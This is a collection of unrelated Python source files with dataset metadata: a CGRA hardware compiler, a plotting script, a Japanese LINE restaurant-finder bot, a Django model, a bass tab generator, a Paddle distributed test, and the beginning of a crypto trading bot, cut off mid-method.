@staticmethod\n def get_input_output(netlist):\n inputs = []\n outputs = []\n for _, net in netlist.items():\n for blk_id, port in net:\n if port == \"io2f_16\":\n inputs.append(blk_id)\n elif port == \"f2io_16\":\n outputs.append(blk_id)\n elif port == \"io2f_1\":\n inputs.append(blk_id)\n elif port == \"f2io_1\":\n outputs.append(blk_id)\n return inputs, outputs\n\n def get_io_interface(self, inputs, outputs, placement, id_to_name):\n input_interface = []\n output_interface = []\n reset_port_name = \"\"\n valid_port_name = \"\"\n\n for blk_id in inputs:\n x, y = placement[blk_id]\n bit_width = 16 if blk_id[0] == \"I\" else 1\n name = f\"glb2io_{bit_width}_X{x:02X}_Y{y:02X}\"\n input_interface.append(name)\n assert name in self.interconnect.interface()\n blk_name = id_to_name[blk_id]\n if \"reset\" in blk_name:\n reset_port_name = name\n for blk_id in outputs:\n x, y = placement[blk_id]\n bit_width = 16 if blk_id[0] == \"I\" else 1\n name = f\"io2glb_{bit_width}_X{x:02X}_Y{y:02X}\"\n output_interface.append(name)\n assert name in self.interconnect.interface()\n blk_name = id_to_name[blk_id]\n if \"valid\" in blk_name:\n valid_port_name = name\n return input_interface, output_interface,\\\n (reset_port_name, valid_port_name)\n\n def compile(self, halide_src):\n if not self.mapper_initalized:\n self.initialize_mapper(self.__rewrite_rules)\n mapped, instrs = self.map(halide_src)\n # id to name converts the id to instance name\n netlist, bus, id_to_name = self.convert_mapped_to_netlist(mapped)\n fixed_io = place_io_blk(id_to_name, self.width)\n placement, routing = archipelago.pnr(self.interconnect, (netlist, bus),\n cwd=\"temp\",\n id_to_name=id_to_name,\n fixed_pos=fixed_io)\n bitstream = []\n bitstream += self.interconnect.get_route_bitstream(routing)\n bitstream += self.get_placement_bitstream(placement, id_to_name,\n instrs)\n inputs, outputs = self.get_input_output(netlist)\n input_interface, output_interface, \\\n (reset, valid) = self.get_io_interface(inputs,\n outputs,\n placement,\n id_to_name)\n return bitstream, (input_interface, output_interface, reset, valid)\n\n def create_stub(self):\n result = \"\"\"\nmodule Garnet (\n input clk,\n input [31:0] config_config_addr,\n input [31:0] config_config_data,\n input [0:0] config_read,\n input [0:0] config_write,\n output [31:0] read_config_data,\n input reset,\n input [3:0] stall,\n\"\"\"\n # loop through the interfaces\n ports = []\n for port_name, port_node in self.interconnect.interface().items():\n io = \"output\" if \"io2glb\" in port_name else \"input\"\n ports.append(f\" {io} [{port_node.width - 1}:0] {port_name}\")\n result += \",\\n\".join(ports)\n result += \"\\n);\\nendmodule\\n\"\n with open(\"garnet_stub.v\", \"w+\") as f:\n f.write(result)\n\n def name(self):\n return \"Garnet\"\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Garnet CGRA')\n parser.add_argument('--width', type=int, default=4)\n parser.add_argument('--height', type=int, default=2)\n parser.add_argument(\"--input-app\", type=str, default=\"\", dest=\"app\")\n parser.add_argument(\"--input-file\", type=str, default=\"\", dest=\"input\")\n parser.add_argument(\"--output-file\", type=str, default=\"\", dest=\"output\")\n parser.add_argument(\"--gold-file\", type=str, default=\"\",\n dest=\"gold\")\n parser.add_argument(\"-v\", \"--verilog\", action=\"store_true\")\n parser.add_argument(\"--no-pd\", \"--no-power-domain\", action=\"store_true\")\n parser.add_argument(\"--rewrite-rules\", type=str, default=\"\")\n parser.add_argument(\"--interconnect-only\", action=\"store_true\")\n parser.add_argument(\"--no_sram_stub\", action=\"store_true\")\n args = parser.parse_args()\n\n if not args.interconnect_only:\n assert args.width % 4 == 0 and args.width >= 4\n garnet = Garnet(width=args.width, height=args.height,\n add_pd=not args.no_pd,\n interconnect_only=args.interconnect_only,\n use_sram_stub=not args.no_sram_stub)\n\n if args.rewrite_rules:\n garnet.set_rewrite_rules(args.rewrite_rules)\n\n if args.verilog:\n garnet_circ = garnet.circuit()\n magma.compile(\"garnet\", garnet_circ, output=\"coreir-verilog\",\n coreir_libs={\"float_DW\"})\n garnet.create_stub()\n\n if len(args.app) > 0 and len(args.output) > 0:\n # do PnR and produce bitstream\n bitstream, (inputs, outputs, reset, valid) = garnet.compile(args.app)\n with open(args.output, \"w+\") as f:\n bs = [\"{0:08X} {1:08X}\".format(entry[0], entry[1]) for entry\n in bitstream]\n f.write(\"\\n\".join(bs))\n\n # if input and gold is provided\n if len(args.input) > 0 and len(args.gold) > 0:\n # if we want to compare, write out the test configuration as well\n # write out the config file\n if len(inputs) > 1:\n inputs.remove(reset)\n assert len(inputs) == 1\n if len(outputs) > 1:\n outputs.remove(valid)\n assert len(outputs) == 1\n config = {\n \"input_filename\": args.input,\n \"bitstream\": args.output,\n \"gold_filename\": args.gold,\n \"output_port_name\": outputs[0],\n \"input_port_name\": inputs[0],\n \"valid_port_name\": valid,\n \"reset_port_name\": reset\n }\n with open(f\"{args.output}.json\", \"w+\") as f:\n json.dump(config, f)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"garnet.py","file_name":"garnet.py","file_ext":"py","file_size_in_byte":18741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"569092225","text":"# coding=utf-8\nimport numpy as np\nimport sys\nsys.path.insert(0, \"../imp/\")\nimport NeuNet # noqa: E402\nimport plott\n\ngraph = plott.Plott(\"../wrt/NeuNetNorm/fitness_timeline.html\",\n a_title=\"fitness timeline\",\n a_x_label=\"fitness\",\n a_y_label=\"time\")\nlines = [line.rstrip('\\n') for line in open(\"../wrt/NeuNetNorm/key_data.txt\")]\nneurons_per_layer = str(lines[0])[21:len(lines[0])-1]\nlayer = str(lines[2])[9:len(lines[2])-1]\n\nNeuNet = NeuNet.NeuNet(\"../wrt/NeuNetNorm/NeuNetGOOG.csv\", \"../wrt/NeuNetNorm/NeuNetHistory.csv\",\n layer, neurons_per_layer, 2)\nNeuNet.read()\n\ny = NeuNet.fitnessHistory\n\ngraph.add_graph(y,\n alpha=1,\n mode=\"line\",\n legend=\"fitness\",\n colour=\"blue\",\n width=3)\ngraph.save_plott(mode=\"show\")\n","sub_path":"tst/fitness_timeline.py","file_name":"fitness_timeline.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241226269","text":"from flask import Flask, request, abort,render_template\nimport os,json\nimport subprocess\nimport requests\nfrom bs4 import BeautifulSoup\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n BeaconEvent,QuickReply,QuickReplyButton,\n TemplateSendMessage,ButtonsTemplate,\n CarouselTemplate,CarouselColumn,PostbackEvent,MessageAction,LocationMessage,\n PostbackAction,URIAction,LocationAction,ImageMessage,ImageSendMessage\n)\n\napp = Flask(__name__)\n\n#環境変数取得\nYOUR_CHANNEL_ACCESS_TOKEN = os.environ[\"YOUR_CHANNEL_ACCESS_TOKEN\"]\nYOUR_CHANNEL_SECRET = os.environ[\"YOUR_CHANNEL_SECRET\"]\nYOUR_API_KEYID=os.environ['YOUR_API_KEYID']\n\nline_bot_api = LineBotApi(YOUR_CHANNEL_ACCESS_TOKEN)\nhandler = WebhookHandler(YOUR_CHANNEL_SECRET)\n\nwanna_eat='たこ焼き'\n\n#データを取得して、URLを返還する。その後、\n\n\n#食べ物の情報をとってくる函数(ぐるなびAPI)\n#引数   fName:食べ物の名前\n#     fLat :現在地の緯度\n#     fLon :現在地の経度\n#return値 レストラン情報\ndef getFoodsInfo(fName,fLat,fLon):\n url = \"https://api.gnavi.co.jp/RestSearchAPI/v3/\"\n\n params={}\n params[\"keyid\"] = YOUR_API_KEYID\n params[\"freeword\"] = fName\n params[\"latitude\"] = fLat\n params[\"longitude\"] = fLon\n\n #range=検索範囲の半径の大きさ(1~5) 10件以上見つかる最小の大きさを求める\n for i in range(1,6):\n params[\"range\"] = i\n result = requests.get(url, params)\n if(countHit(result.json())>=10):\n break\n\n print(\"range:%d\" % i)\n return result.json() \n\n#ヒット件数を求める函数.レスポンスがエラー時の処理も行う.\n#引数   restInfo:ぐるなびAPIが返したレストラン情報\n#return値 ヒット件数\ndef countHit(restInfo): \n return restInfo.get('total_hit_count', 0)\n\n#取得結果を表示する\n#引数   restInfo:ぐるなびAPIが返したレストラン情報\n#return値 void\n\ndef printFoodsInfo(restInfo):\n hitCnt=countHit(restInfo)\n Address=[],Name=[]\n for i in range(hitCnt):\n if i==4:\n break\n if(restInfo['rest'][i]['address']):\n Address.append(restInfo['rest'][i]['address'])\n Name.append(restInfo['rest'][i]['name'])\n return Address,Name\n\n@app.route(\"/\")\ndef hello_world():\n return render_template('index.html')\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n@handler.add(MessageEvent,message=LocationMessage)\ndef handle_location(event):\n global wanna_eat \n lat=event.message.latitude\n lon=event.message.longitude\n \n questions=['たこ焼き','串カツ','お好み焼き','肉まん']\n items=[QuickReplyButton(action=PostbackAction(label=f\"{question}\",data=f\"{question}\")) for question in questions]\n orders=TextSendMessage(text=\"どれにする?\",quick_reply=QuickReply(items=items))\n line_bot_api.push_message(event.source.user_id,messages=orders)\n \n try:\n data=getFoodsInfo(wanna_eat,lat,lon)\n Address,Name=printFoodsInfo(data)\n carousel_template = CarouselTemplate(columns=[\n CarouselColumn(text='場所:f{address}', title='f{name}', actions=[\n PostbackAction(label='ありがとう。', data='ありがとう。')\n ]) for place,name in zip(Address,Name)])\n template_message = TemplateSendMessage(\n alt_text='Carousel alt text', template=carousel_template)\n line_bot_api.push_message(event.source.user_id,template_message)\n except:\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっとよく分からんわ。'))\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n questions=['お店','作り方','お土産','アメちゃん']\n if(event.message.text=='おばちゃーん'):\n items=[QuickReplyButton(action=PostbackAction(label=f\"{question}\",data=f\"{question}\")) for question in questions]\n orders=TextSendMessage(text=\"どないしたん?\",quick_reply=QuickReply(items=items))\n line_bot_api.reply_message(event.reply_token,messages=orders)\n\n elif(event.message.text=='リスト'):\n buttons_template = ButtonsTemplate(\n title='My buttons sample',text='Hello, my buttons',thumbnail_image_url=\"https://denx.jp/wp-content/uploads/2018/04/cropped-DENXバナー2-1-1.png\",actions=[\n URIAction(label='ホームページ', uri='https://denx.jp')\n ])\n template_message = TemplateSendMessage(alt_text='DENXサイト', template=buttons_template)\n line_bot_api.reply_message(event.reply_token, template_message)\n\n# 以下の handler は、改良してより短く記述すべき。\n@handler.add(PostbackEvent)\ndef hander_postback(event):\n global wanna_eat\n text=event.postback.data\n if text=='アメちゃん':\n line_bot_api.reply_message(event.reply_token,ImageSendMessage(\n original_content_url='https://1.bp.blogspot.com/-ZELov-QvHaU/UVWMfIiV3bI/AAAAAAAAPIM/xxWcxLdHrwk/s1600/candy.png',\n preview_image_url='https://1.bp.blogspot.com/-ZELov-QvHaU/UVWMfIiV3bI/AAAAAAAAPIM/xxWcxLdHrwk/s1600/candy.png'\n ))\n elif text=='お土産':\n survenier=ButtonsTemplate(\n text='お土産ならここやな', actions=[\n URIAction(label='お土産', uri='line://app/1598486025-lMb5nvo4'),\n ])\n line_bot_api.reply_message(event.reply_token,TemplateSendMessage(alt_text='お土産',template=survenier))\n elif text=='作り方':\n how_to_make=ButtonsTemplate(\n text='このホームページ通りにやったらできるで。\\nしらんけど。', actions=[\n URIAction(label='作り方', uri='https://cookpad.com/'),\n ])\n line_bot_api.reply_message(event.reply_token,TemplateSendMessage(alt_text='作り方',template=how_to_make))\n \n elif text=='お店':\n #検索ボットを利用\n restaurant=ButtonsTemplate(\n text='今の場所から近いお店伝えるで。ええか?', actions=[\n LocationAction(label='お願い'),\n ])\n template_message=TemplateSendMessage(alt_text='位置情報送信しますか?',template=restaurant)\n line_bot_api.reply_message(event.reply_token,template_message)\n #データの取得方法を探す。\n elif text=='串カツ':\n wanna_eat='串カツ'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='肉まん':\n wanna_eat='肉まん'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='お好み焼き':\n wanna_eat='お好み焼き'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='たこ焼き':\n wanna_eat='たこ焼き'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='ありがとう':\n line_bot_api.reply_message(event.reply_token,TextSendMessage(text='おおきに')) \n\nif __name__ == \"__main__\":\n# app.run()\n port = int(os.getenv(\"PORT\"))\n app.run(host=\"0.0.0.0\", port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164312100","text":"from django.db import models\nfrom plaid_cards.models import PlaidCard\n\n\nclass BillDue(models.Model):\n current_balance = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n blank=True,\n null=True\n )\n balance_due = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n blank=True,\n null=True\n )\n due_date = models.DateTimeField(\n null=True,\n blank=True\n )\n mark_as_paid = models.BooleanField(\n default=False\n )\n paid_on = models.DateTimeField(\n null=True,\n blank=True\n )\n daily_status = models.BooleanField(\n default=False\n )\n start_bill = models.DateTimeField(\n null=True,\n blank=True\n )\n\n note = models.TextField(\n blank=True,\n null=True\n )\n plaid_card = models.ForeignKey(PlaidCard, related_name='bill_due')\n\n def __str__(self):\n return str(self.id)\n","sub_path":"debitize/debitize/bill_dues/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621163511","text":"turn = (\"Turnaround\",0,5,1,4)\r\ncircle = (\"Circle Progression\",5,1,4,0)\r\natebar = (\"Eight-bar Blues (Use 7th chords!)\",0,4,3,3,0,4,3,1,4)\r\ntwelver = (\"Twelve-bar Blues (Mix in some 7ths!)\",0,3,0,0,3,3,0,0,4,3,0,0)\r\nsprog = (\"Sensitive Female Progression\",5,3,0,4)\r\nfiddy = (\"50's progression (Doo-wop maybe?)\",0,5,3,4)\r\ntoofi = (\"ii-V-I (jazz harmony?)\",1,4,0)\r\ndict = {1:turn,\r\n\t\t2:circle,\r\n\t\t3:atebar,\r\n\t\t4:twelver,\r\n\t\t5:sprog,\r\n\t\t6:fiddy,\r\n\t\t7:toofi,}\r\noutfile=str(\"C:/Users/Yang55/Downloads/chords.txt\")\r\nimport random, csv, os\r\nprint(\"Enter a major or (m)inor chord to generate a circle of fifths progression, no flats and no need to label major chords!\")\r\nprint(\"ex: F#m, G#, and E are all valid forms. Gbma, Eb, and Cmaj are not valid forms.\")\r\nUinput = input(\"Write anything else for a randomized root note!\\n: \")\r\nprint(\"Enter the amount of chords you want in your progression!\\nEnter 0 to map the entire circle!\\nenter 1 to choose from a bank of common progressions!\")\r\nChordct = input(\"Write any non-int to have a randomly generated progression!\\n\")\r\ndef proggen(rootchr,chrct):\r\n\tMajor = ['A','A#','B','C','C#','D','D#','E','F','F#','G','G#']\r\n\tMinor = ['Am','A#m','Bm','Cm','C#m','Dm','D#m','Em','Fm','F#m','Gm','G#m']\r\n\tcfif=[0,2,4,5,7,9]\r\n\tcalt=[-12,-10,-8,-7,-5,-3]\r\n\tckeysval=[1,0,0,1,1,0]\r\n\tckeys=[\"Major\",\"Minor\",\"Minor\",\"Major\",\"Major\",\"Minor\"]\r\n\tnumchord = [\"I\",\"ii\",\"iii\",\"IV\",\"V\",\"vi\"]\r\n\ty=0\r\n\tls=[]\r\n\tresult=\"\"\r\n\ts = ' '\r\n\ttempkey=1\r\n\tprog=[]\r\n\ttry:\r\n\t\ttwrite=open(outfile, 'w')\r\n\texcept PermissionError:\r\n\t\tprint(\"looks like there was a permission error: please use administrator access in order to save a log file please!\")\r\n\r\n\tif rootchr in Major:\r\n\t\tfor x in range(0,11):\r\n\t\t\tif (Major[x] == rootchr):\r\n\t\t\t\trootchr = x\r\n\telif rootchr in Minor:\r\n\t\tfor x in range(0,11):\r\n\t\t\tif (Minor[x] == rootchr):\r\n\t\t\t\ttry:\r\n\t\t\t\t\trootchr = x + 3\r\n\t\t\t\texcept IndexError:\r\n\t\t\t\t\trootchr = x - 9\r\n\telse:\r\n\t\tprint(\"randomizing root note...\\n\")\r\n\t\ttwrite.write('root note randomized\\n')\r\n\t\trootchr=random.randint(0,11)\r\n\tfor x in range(0,6):\r\n\t\ttempnote=[]\r\n\t\ttry:\r\n\t\t\ttempnote.append(Major[rootchr+cfif[x]])\r\n\t\texcept IndexError or TypeError:\r\n\t\t\ttempnote.append(Major[rootchr+calt[x]])\r\n\t\ttempnote.append(ckeys[x])\r\n\t\ttempnote.append(\"(\"+numchord[x]+\")\")\r\n\t\tresult = s.join(tempnote)\r\n\t\tls.append(result)\r\n\t\tx=+1\r\n\ttry:\r\n\t\tint(chrct)\r\n\texcept ValueError or TypeError:\r\n\t\tprint('randomizing chord count...')\r\n\t\ttwrite.write('chord count randomized\\n')\r\n\t\tchrct = random.randint(3,10)\r\n\tif int(chrct) > 1:\r\n\t\tfor n in range (1,int(chrct)):\r\n\t\t\tprog.append(ls[random.randint(0,5)])\r\n\telif int(chrct) == 1:\r\n\t\ttemprand = random.randint(1,3)\r\n\t\tprint((dict[temprand])[0])\r\n\t\ttwrite.write((dict[temprand])[0]+'\\n')\r\n\t\tfor n in range(1,len(dict[temprand])):\r\n\t\t\tprog.append(ls[(dict[temprand])[n]])\r\n\telif int(chrct) < 1:\r\n\t\tfor n in range (0,6):\r\n\t\t\tprog.append(ls[n])\r\n\tprint ('[%s]' % ', '.join(map(str, prog)))\r\n\ttwrite.write('[%s]' % ', '.join(map(str, prog))+'\\n')\r\n\ttwrite.close()\r\n\treturn prog\r\n\t\r\ndef scalegen(prog):\r\n\t\r\n\tsemitone = ['A','A#/Bb','B','C','C#/Db','D','D#/Eb','E','F','F#/Gb','G','G#/Ab']\r\n\tmajmod = [0,2,4,5,7,9,11]\r\n\tmajalt = [0,-10,-8,-7,-5,-3,-1]\r\n\tminmod = [0,2,3,5,7,8,10]\r\n\tminalt = [0,-10,-9,-7,-5,-4,-2]\r\n\tTonic=''\r\n\tSupertonic=''\r\n\tMediant=''\r\n\tSubdominant=''\r\n\tDominant=''\r\n\tSupermediant=''\r\n\tLeading=''\r\n\ttempscale=[]\r\n\tkeys = {1:majmod,\r\n\t\t\t2:majalt,\r\n\t\t\t3:minmod,\r\n\t\t\t4:minalt}\r\n\tdegrees = {\t0:Tonic,\r\n\t\t\t\t1:Supertonic,\r\n\t\t\t\t2:Mediant,\r\n\t\t\t\t3:Subdominant,\r\n\t\t\t\t4:Dominant,\r\n\t\t\t\t5:Supermediant,\r\n\t\t\t\t6:Leading\t}\r\n\tfor x in range(0,len(prog)):\r\n\t\ttry:\r\n\t\t\ttwrite=open(outfile, 'a')\r\n\t\texcept PermissionError:\r\n\t\t\tprint(\"looks like there was a permission error: please use administrator access in order to save a log file please!\")\r\n\t\ttwrite.write(prog[x]+'\\n')\r\n\t\ttempscale=[]\r\n\t\tif (\"Major\" in prog[x]):\r\n\t\t\tk = 1\r\n\t\telif (\"Minor\" in prog[x]):\r\n\t\t\tk = 3\r\n\t\tfor n in range(0,11):\r\n\t\t\tif (semitone[n] == (prog[x])[:1]):\r\n\t\t\t\troot = n\r\n\t\t\t\tif \"#\" in semitone[n]:\r\n\t\t\t\t\troot =+ 1\r\n\t\t\t\tfor j in range (0,6):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tdegrees[j] = semitone[root + (keys[k])[j]]\t\r\n\t\t\t\t\texcept IndexError:\r\n\t\t\t\t\t\tk = k+1\r\n\t\t\t\t\t\tdegrees[j] = semitone[root + (keys[k])[j]]\r\n\t\t\t\t\ttempscale.append(degrees[j])\r\n\t\tprint (\"the following scale is in the key of \"+prog[x]+\":\")\r\n\t\tprint ('[%s]' % ', '.join(map(str, tempscale)))\r\n\t\tdef basstranscribe(scalels):\r\n\t\t\tsemitone = ['A','A#/Bb','B','C','C#/Db','D','D#/Eb','E','F','F#/Gb','G','G#/Ab']\r\n\t\t\tEstring = 7\r\n\t\t\tAstring = 0\r\n\t\t\tDstring = 5\r\n\t\t\tGstring = 10\r\n\t\t\ttnote = 0\r\n\t\t\tchordbox = []\r\n\t\t\tGls=[]\r\n\t\t\tDls=[]\r\n\t\t\tAls=[]\r\n\t\t\tEls=[]\r\n\t\t\tstringmaps = (\"\",\"G String\", \"D String\", \"A String\", \"E String\")\r\n\t\t\tstrings ={\t1:Gstring,\r\n\t\t\t\t\t\t2:Dstring,\r\n\t\t\t\t\t\t3:Astring,\r\n\t\t\t\t\t\t4:Estring}\r\n\t\t\tstls={\t1:Gls,\r\n\t\t\t\t\t2:Dls,\r\n\t\t\t\t\t3:Als,\r\n\t\t\t\t\t4:Els}\r\n\t\t\tfor note in scalels:\r\n\t\t\t\tGls=[]\r\n\t\t\t\tDls=[]\r\n\t\t\t\tAls=[]\r\n\t\t\t\tEls=[]\r\n\t\t\t\tfor notenum in range(0,len(semitone)):\r\n\t\t\t\t\tif (semitone[notenum] == note):\r\n\t\t\t\t\t\ttnote = notenum\r\n\t\t\t\t\t\tprint(\"for the note \"+ note +\",\")\r\n\t\t\t\t\t\tfor string in range (1,5):\t\t\t#if you're partial to hitting not hitting some bass strings..\r\n\t\t\t\t\t\t\tchordbox=[]\r\n\t\t\t\t\t\t\tfor x in range (0,24):\t\t#change the range to choose preferences (ie playing on the neck)\r\n\t\t\t\t\t\t\t\tif (((strings[string] + x)%12)==tnote):\r\n\t\t\t\t\t\t\t\t\tchordbox.append(x)\r\n\t\t\t\t\t\t\t\t\tstls[string].append(x)\r\n\t\t\t\t\t\t\t\t\tstls[string].sort()\r\n\t\t\t\t\t\t\tprint(\"on the \"+stringmaps[string]+\", you can play:\"+('[%s]' % ', '.join(map(str, chordbox))))\r\n\t\t\ttwrite.write(\"G \"+('[%s]' % ', '.join(map(str, stls[1])))+'\\n'+\"D \"+('[%s]' % ', '.join(map(str, stls[2])))+'\\n'+\"A \"+('[%s]' % ', '.join(map(str, stls[3])))+'\\n'+\"E \"+('[%s]' % ', '.join(map(str, stls[4])))+'\\n\\n')\r\n\t\t\ttwrite.close()\r\n\t\tbasstranscribe(tempscale)\t\r\nprog = proggen(Uinput,Chordct)\r\nscalegen(prog)\r\n","sub_path":"shitty bass tab generator.py","file_name":"shitty bass tab generator.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384446662","text":"# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport subprocess\nimport sys\nimport tempfile\nimport unittest\n\n\nclass TestGradientClip(unittest.TestCase):\n def test_dp2(self):\n file_dir = os.path.dirname(os.path.abspath(__file__))\n launch_model_path = os.path.join(\n file_dir, \"clip_grad_by_global_norm.py\"\n )\n\n if os.environ.get(\"WITH_COVERAGE\", \"OFF\") == \"ON\":\n coverage_args = [\"-m\", \"coverage\", \"run\", \"--branch\", \"-p\"]\n else:\n coverage_args = []\n\n tmp_dir = tempfile.TemporaryDirectory()\n cmd = (\n [sys.executable, \"-u\"]\n + coverage_args\n + [\n \"-m\",\n \"paddle.distributed.launch\",\n \"--devices\",\n \"0,1\",\n \"--log_dir\",\n tmp_dir.name,\n launch_model_path,\n ]\n )\n\n process = subprocess.Popen(cmd)\n process.wait()\n self.assertEqual(process.returncode, 0)\n\n tmp_dir.cleanup()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/auto_parallel/test_pass_grad_clip.py","file_name":"test_pass_grad_clip.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73133319","text":"import configparser\nfrom TechnicalAnalysis import OHLC\nfrom TechnicalAnalysis import Indicators\nfrom TechnicalAnalysis import MFISignal\nfrom datetime import datetime\nfrom Portfolio import Transaction\nimport time\nfrom Binance import BinacePublic, BinancePrivate\nimport pathlib\nimport json\nimport logging\nimport os\nimport threading\nfrom plyer import notification\n#from MessageQueue import MQManager, MQExchange, MQProducer\nfrom Constants import Constants\n\nBOT_TYPE_MFI = \"MFI\"\nBOT_TYPE_STDEV = \"STDEV\"\n\n\nclass decision_logEntry:\n def __init__(self, current_price, decision, msg):\n self.decision_time = datetime.utcnow()\n self.current_price = current_price\n self.decision = decision\n self.msg = msg\n\n\nclass TradingBot(threading.Thread):\n\n def __init__(self, dict):\n threading.Thread.__init__(self)\n logging.debug(\"inside TradingBot>Constructor\")\n self.loadFromBotConfig(dict)\n self.previous_mfi = None\n self.dict_transaction_log = {}\n self.decision_log = []\n self.loadFromBotConfig(dict)\n #self.loadFromDictionary(dict)\n self.last_buy_open_time = None\n self.save()\n\n def loadFromBotConfig(self,dict):\n self.type = dict[\"type\"]\n self.base_symbol = dict[\"base_symbol\"]\n self.quote_symbol = dict[\"quote_symbol\"]\n self.interval = dict[\"interval\"]\n self.initial_amount = float(dict[\"initial_amount\"])\n self.stop_loss = float(dict[\"stop_loss\"])\n self.take_profit = float(dict[\"take_profit\"])\n self.trailing_Stop_loss = float(dict[\"trailing_stop_loss\"])\n self.id = \"{}_{}{}_{}\".format(self.type, self.base_symbol, self.quote_symbol, self.interval)\n self.pair = self.base_symbol + self.quote_symbol\n\n def loadFromDictionary(self, dict):\n # Set values from parameters\n #self.type = dict[\"type\"]\n #self.base_symbol = dict[\"base_symbol\"]\n #self.quote_symbol = dict[\"quote_symbol\"]\n \n #self.interval = dict[\"interval\"]\n #self.initial_amount = float(dict[\"initial_amount\"])\n #self.stop_loss = float(dict[\"stop_loss\"])\n #self.take_profit = float(dict[\"take_profit\"])\n #self.trailing_Stop_loss = float(dict[\"trailing_stop_loss\"])\n #self.id = \"{}_{}{}_{}\".format(self.type, self.base_symbol, self.quote_symbol, self.interval)\n #self.pair = self.base_symbol + self.quote_symbol\n\n self.base_quantity = None\n self.current_price = None\n self.previous_price = None\n\n self.current_amount = float(self.initial_amount)\n if \"current_amount\" in dict.keys():\n self.current_amount = dict[\"current_amount\"]\n\n if \"base_quantity\" in dict.keys() and dict[\"base_quantity\"] is not None:\n self.base_quantity = float(dict[\"base_quantity\"])\n\n if \"current_price\" in dict.keys() and dict[\"current_price\"] is not None:\n self.current_price = float(dict[\"current_price\"])\n\n if \"previous_price\" in dict.keys() and dict[\"previous_price\"] is not None:\n self.previous_price = float(dict[\"previous_price\"])\n\n # Selling attrubutes\n self.trailing_stop_loss_enabled = None\n self.current_stop_loss_price = None\n self.current_take_profit_price = None\n if \"trailing_stop_loss_enabled\" in dict.keys() and dict[\"trailing_stop_loss_enabled\"] is not None:\n self.trailing_stop_loss_enabled = bool(dict[\"trailing_stop_loss_enabled\"])\n\n if \"current_stop_loss_price\" in dict.keys() and dict[\"current_stop_loss_price\"] is not None:\n self.current_stop_loss_price = float(dict[\"current_stop_loss_price\"])\n\n if \"current_take_profit_price\" in dict.keys() and dict[\"current_take_profit_price\"] is not None:\n self.current_take_profit_price = float(dict[\"current_take_profit_price\"])\n\n # Indicators\n self.current_mfi = None\n self.current_stdev = None\n self.current_mean = None\n self.previous_mfi = None\n\n if \"current_mfi\" in dict.keys() and dict[\"current_mfi\"] is not None:\n self.current_mfi = float(dict[\"current_mfi\"])\n\n if \"current_stdev\" in dict.keys() and dict[\"current_stdev\"] is not None:\n self.current_stdev = float(dict[\"current_stdev\"])\n\n if \"current_mean\" in dict.keys() and dict[\"current_mean\"] is not None:\n self.current_mean = float(dict[\"current_mean\"])\n\n # Status\n self.is_active = False\n self.status = \"SEARCHING\"\n\n if \"is_active\" in dict.keys() and dict[\"is_active\"] is not None:\n self.is_active = bool(dict[\"is_active\"])\n\n if \"status\" in dict.keys() and dict[\"status\"] is not None:\n self.status = dict[\"status\"]\n\n self.current_transaction = None\n if \"current_transaction\" in dict.keys():\n trans = Transaction()\n trans.loadFromDictionary(dict[\"current_transaction\"])\n self.current_transaction = trans\n\n # TODO : Load transaction log\n try:\n if \"transaction_log\" in dict.keys():\n for k,d in dict[\"transaction_log\"].items():\n self.dict_transaction_log[k] = d\n except:\n self.logger(\"error occured while loading transaction log\")\n\n\n # If no transaction is open then set status to SEARCHING\n if self.current_transaction is None:\n self.status = \"SEARCHING\"\n\n b = BinacePublic()\n # self.updatePrice(b.getAveragePrice(self.pair))\n self.updatePrice(b.getLatestPrice(self.pair))\n\n self.log_file_name = \"\"\n self.logger = logging.getLogger(self.id)\n self.setLogger()\n self.save_file_path = os.path.join(\"Database\",\"bots_state\", self.id + \".json\")\n self.active_file_path = os.path.join(\"Database\",\"bots_active\" , self.id + \".top\")\n\n def sendHeartBeat(self):\n\n try:\n\n msg_dict = {}\n msg_dict[\"id\"] = self.id\n msg_dict[\"pair\"] = self.pair\n 